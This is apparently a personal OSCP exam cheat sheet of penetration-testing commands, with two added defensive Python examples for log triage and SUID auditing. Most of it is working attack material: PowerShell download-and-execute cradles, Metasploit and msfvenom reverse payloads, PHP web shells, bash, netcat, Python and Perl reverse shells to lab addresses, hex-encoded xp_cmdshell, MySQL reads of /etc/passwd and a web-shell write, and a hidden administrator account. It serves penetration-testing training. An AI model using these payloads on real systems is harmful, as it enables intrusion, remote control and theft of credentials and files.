My Personal OSCP Notes
Welp, just my personal OSCP notes. I am pretty sure these can help you get a VERY high score in your exam. So why not try them out?
I am still organizing all my scripts and stuff. Please stay tuned to the repo.
PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
PowerSploit - Post-exploit framework - https://github.com/PowerShellMafia/PowerSploit
nishang - Post-exploit Toolkit - https://github.com/samratashok/nishang
Windows Privilege Escalation Fundamentals
Windows Privilege Escalation Methods for Pentesters
Ways to Download and Execute code via the Commandline
Windows Privilege Escalation - a cheatsheet
SQL Injection Techniques - https://www.exploit-db.com/docs/41273.pdf
Useful notes - https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
OSCP Sample Report
Offsec MSFVENOM
Offsec Mimikatz
Offsec Exam Guide
PWK Forum
Offensive Security's Complete Guide to Alpha
Hash Cracking
# Process list with user
tasklist /v
# Get all listening/connected port
netstat -a
# Get all local users
net users
# Launch powershell bypass policy
powershell -ep bypass
# Get all services (Recommend using PowerShell method instead)
sc query type= service > C:\inetpub\wwwroot\ServicesList.txt
# Process list with detailed command line
ps -Afwww
# Get all listening/connected port
netstat -natlp
# Get all files with SUID bit
find / -perm /4000
Please have a look at PowerSploit and Nishang; both give you powerful features to finish your enumeration on Windows.
# Import/Load library (either one)
. .\powersploit.psd1
Import-Module .\powersploit.psd1
# PowerShell One-liner
powershell -c <COMMAND>
# Download File (Windows XP/PowerShell 2.0+)
powershell "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.51:4949/yo.exe','yo.exe')"
# Download File and execute (PowerShell 3.0+)
# iex = Invoke-Expression (Execution)
# iwr = Invoke-WebRequest (Download)
iex (iwr 'http://EVIL/evil.ps1')
# Jump x86 PowerShell to X64 PowerShell [Out-Of-OSCP-Scope]
C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe -NonInteractive -NoProfile
# Get all services and write into file
Get-WmiObject win32_service | select Name, DisplayName, State, PathName |export-csv C:/inetpub/wwwroot/checks.txt
# Scanning TCP ports 1 - 65535 + verbose + OS detection + timeout settings + treat all host online
nmap -vv -p- -A -T4 -sV -Pn <IP>
# Find useful Nmap Scripting Engine (NSE) scripts [change $1 to your keyword or save it as a script]
ls -la /usr/share/nmap/scripts/ | grep "$1" | awk '{print $NF}'
# Shell listener for reverse payload (Server side)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.45.31
set LPORT 1337
set ExitOnSession false
exploit -j -z
# PHP Meterpreter reverse payload (reverse_tcp is the one that takes LHOST/LPORT)
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.11.0.51 LPORT=1337 -f php > meterp.php
# Find useful payload for msfvenom/metasploit (save it as script; each keyword narrows the list)
#!/bin/bash
# Usage: ./findpayload.sh <keyword> [<keyword> ...]
cmd="msfvenom -l payloads"
for i in "$@"
do
  # append one grep per keyword to the pipeline, then evaluate the whole string
  cmd="$cmd | grep -i \"$i\""
done
eval "$cmd"
# Getting list of available format
msfvenom -l format
# General guide of msfvenom
msfvenom -f <FORMAT> -p <PAYLOAD> -e <ENCODE_METHOD> -b <BAD_CHAR> -o <OUTPUT_FILE> -a <ARCHITECTURE> [LHOST=<REVERSE_HOST> LPORT=<REVERSE_PORT>]
# PHP error display (useful for testing shells)
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
# PHP Simple Shell
<?php echo system($_GET['cmd']);?>
<?php @system($_GET['c'])?>
# bash reverse shell
bash -i >& /dev/tcp/10.11.0.51/1337 0>&1
# netcat (nc) reverse shell (simple)
/bin/sh | nc <your IP> <port>
# netcat (nc) reverse shell with -e (requires an nc build that supports -e)
nc -e /bin/bash <your IP> <port>
# Python reverse shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.38.31",1339));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
# Perl reverse shell
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.11.1.246:1337");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
# Python PTY upgrade (useful when the shell you landed in is too basic / non-interactive)
python -c 'import pty;pty.spawn("/bin/bash")'
# MSSQL xp_cmdshell without capturing output (command is hex-encoded: 0x70696e672031302e31312e302e3531 = "ping 10.11.0.51")
DECLARE @c varchar(3000);set @c=0x70696e672031302e31312e302e3531;EXEC master..xp_cmdshell @c--
# MSSQL xp_cmdshell with output captured into a table (sqlmapoutput) for later retrieval (0x64697220433a5c = "dir C:\")
DECLARE @c VARCHAR(8000);SET @c=0x64697220433a5c;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @c--
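The PowerShell download cradles, the bash/netcat/Python reverse shells and the hex-encoded xp_cmdshell statements above all leave very recognisable strings behind in script-block logs, shell audit records and SQL logs. The following is an added example written for these notes (it is not code from PowerSploit, Nishang or any other linked project): a small Python triage routine that first decodes T-SQL `0x...` literals back to ASCII, so a command hidden in a varchar cast becomes visible, and then flags the indicator strings used on this page. The log lines in `SAMPLE_LINES` are constructed for the example, and the indicator names and regexes are my own choices, not an established signature set.

```python
import re

# Constructed sample log lines (made up for this example): PowerShell
# script-block text, Linux command audit lines and an MSSQL statement.
SAMPLE_LINES = [
    "ScriptBlockText: iex (iwr 'http://EVIL/evil.ps1')",
    "ScriptBlockText: (new-object System.Net.WebClient).DownloadFile('http://10.11.0.51:4949/yo.exe','yo.exe')",
    "ScriptBlockText: Get-WmiObject win32_service | select Name, State",
    "cmd: bash -i >& /dev/tcp/10.11.0.51/1337 0>&1",
    "cmd: python -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "sql: DECLARE @c varchar(3000);set @c=0x70696e672031302e31312e302e3531;EXEC master..xp_cmdshell @c--",
    "cmd: find / -perm /4000",
]

# Each indicator is a regex applied to the normalised line; the names are
# descriptive labels chosen for this example.
INDICATORS = {
    "ps_download_cradle": re.compile(
        r"\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest|downloadstring)\b"
        r"|\.downloadfile\s*\(", re.I),
    "bash_dev_tcp": re.compile(r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+"),
    "nc_exec": re.compile(r"\bnc\b.*\s-e\s+/bin/(ba)?sh\b"),
    "pty_spawn": re.compile(r"pty\.spawn\("),
    "xp_cmdshell": re.compile(r"xp_cmdshell", re.I),
}

# T-SQL binary literal such as 0x64697220433a5c
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)\b")


def decode_hex_literals(line):
    """Rewrite T-SQL 0x... literals as quoted ASCII so a command hidden in a
    varchar cast is visible to the matchers.
    Returns (rewritten line, list of decoded strings)."""
    decoded = []

    def repl(match):
        hexdigits = match.group(1)
        if len(hexdigits) % 2:          # odd length: not a byte string, leave it alone
            return match.group(0)
        try:
            text = bytes.fromhex(hexdigits).decode("ascii")
        except UnicodeDecodeError:      # non-ASCII bytes: keep the literal as-is
            return match.group(0)
        if not text.isprintable():      # a binary blob rather than a command string
            return match.group(0)
        decoded.append(text)
        return "'" + text + "'"

    return HEX_LITERAL.sub(repl, line), decoded


def triage(lines):
    """Return one dict per line that matches at least one indicator,
    in input order, with any hex-decoded strings attached."""
    hits = []
    for line in lines:
        normalised, decoded = decode_hex_literals(line)
        names = [name for name, rx in INDICATORS.items() if rx.search(normalised)]
        if names:
            hits.append({"line": line, "indicators": names, "decoded": decoded})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LINES):
        print(hit["indicators"], hit["decoded"], hit["line"])
```

Run over `SAMPLE_LINES`, five of the seven lines are flagged; the MSSQL line is reported as `xp_cmdshell` together with the decoded `ping 10.11.0.51`, while the plain `Get-WmiObject` and `find` lines pass through clean. Decoding before matching is the important design point: matching on the raw `0x...` string would miss the command entirely.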
# Python 2 simple HTTP server (serves the current directory on port 8080; the Python 3 module is http.server)
python -m SimpleHTTPServer 8080
# MySQL: load a local file into a table
LOAD DATA LOCAL INFILE "/etc/passwd" INTO TABLE yolo
# MySQL: clear the table and load another local file
TRUNCATE yolo;LOAD DATA LOCAL INFILE "/etc/phpmyadmin/apache.conf" INTO TABLE yolo;
# MySQL: write a file with SELECT ... INTO DUMPFILE (needs the FILE privilege and a path the DB user can write)
select "<?php echo system($_GET['cmd']);?>" INTO dumpfile '/var/www/html/yolo.php'
# Mount an SMB/CIFS share
mount -t cifs -o user=bob,sec=ntlm,dir_mode=0077 "//10.11.1.136/Bob Share" /mnt/cifs
# John The Ripper
unshadow 10.11.1.141_passwd 10.11.1.141_shadow >10.11.1.141_tocrack
john --word=/usr/share/wordlists/rockyou.txt 10.11.1.141_tocrack --fork=30
# Windows add new administrator account
net user yolo whysoserious /add
net localgroup Administrators yolo /add
# Find root-owned SUID files and save the listing (the ; must be escaped for find)
find / -user root -perm -4000 -exec ls -ldb {} \; > /tmp/uids
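Both SUID searches on this page (`find / -perm /4000` in the Linux enumeration block and the root-owned variant just above) answer "what is setuid right now". From the defensive side the more useful question is "what is setuid that was not there before", which is what a periodic audit should alert on. As an added example written for these notes (not code from any of the linked projects), here is a Python version of the same search that can be restricted to an owner uid and diffed against a known-good baseline; the `demo()` function builds a constructed temporary tree with two setuid files and a baseline listing only one of them.

```python
import os
import stat
import tempfile


def suid_files(root, owner_uid=None):
    """Sorted paths of regular files under root with the setuid bit set.
    owner_uid restricts the result to files owned by that uid (0 = root),
    mirroring 'find / -user root -perm -4000'. Unreadable directories are skipped."""
    found = []
    for dirpath, _dirs, names in os.walk(root, onerror=lambda err: None):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not (st.st_mode & stat.S_ISUID):
                continue
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            found.append(path)
    return sorted(found)


def unexpected_suid(root, baseline, owner_uid=None):
    """Setuid files under root that are not in the known-good baseline list."""
    known = set(baseline)
    return [p for p in suid_files(root, owner_uid) if p not in known]


def demo():
    """Constructed sandbox: a tiny tree with two setuid files, one of which is
    in the baseline. Returns the unexpected ones relative to the sandbox root."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        os.makedirs(os.path.join(root, "tmp"))
        for rel, mode in (("bin/known", 0o4755),        # setuid, in baseline
                          ("tmp/suspicious", 0o4755),   # setuid, not in baseline
                          ("bin/plain", 0o755)):        # ordinary executable
            path = os.path.join(root, rel)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
        baseline = [os.path.join(root, "bin/known")]
        return [os.path.relpath(p, root) for p in unexpected_suid(root, baseline)]


if __name__ == "__main__":
    print(demo())   # ['tmp/suspicious']
```

On a real host you would run `suid_files("/", owner_uid=0)` once on a clean build, store the list, and compare later runs against it; a new entry under a world-writable path like `/tmp` is exactly the kind of finding the audit exists for.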
# GCC: build a 32-bit binary on a 64-bit host (both hash styles so it loads on older loaders)
gcc -m32 -Wl,--hash-style=both -o exploit exploit.c
# SSH Local Bind Tunnel (Bind 1337 on client (local))
ssh -L 127.0.0.1:1337:localhost:443 root@victim
# SSH Remote Bind Tunnel (Bind 1337 on target (remote)) [Useful for tunneling into another network]
ssh -R 127.0.0.1:1337:10.30.0.3:443 root@victim
# SSH Dynamic Tunnel (SOCKS proxy on local port 9999; VPN-like access to the far side)
ssh -D9999 root@victim